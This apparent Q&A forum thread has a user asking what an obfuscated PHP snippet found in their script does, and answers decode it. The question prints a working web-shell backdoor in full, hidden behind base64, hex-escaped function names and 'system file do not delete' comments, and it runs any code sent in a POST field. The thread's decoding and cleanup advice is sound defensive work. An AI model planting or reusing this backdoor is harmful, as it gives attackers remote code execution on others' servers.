How to decode this php code in one of my script

Question

I had this in my php file. looks like some malware but i want to know what does it means what its doing

<?php //cb6f82f3e4007bdaccf419abafab94c8
 $_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
 //system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

Answer 1

$___ stands for base64_decode. Then $__ is base64_decode'd and evaluated, which executes the following:

$code = base64_decode($_);
eval($code);

Which finally executes this:

if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}

I would recommend you to delete it and check other files if they are infected, too.

Answer 2

eval — Evaluate a string as PHP code

Caution

The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

A short Example:

<?php

    $string = 'cup';
    $name = 'coffee';
    $str = 'This is a $string with my $name in it.';
    echo $str. "\n";
    eval("\$str = \"$str\";");
    echo $str. "\n";
?>

Output

This is a $string with my $name in it.
This is a cup with my coffee in it.

Answer 3

Have a look at base64_decode.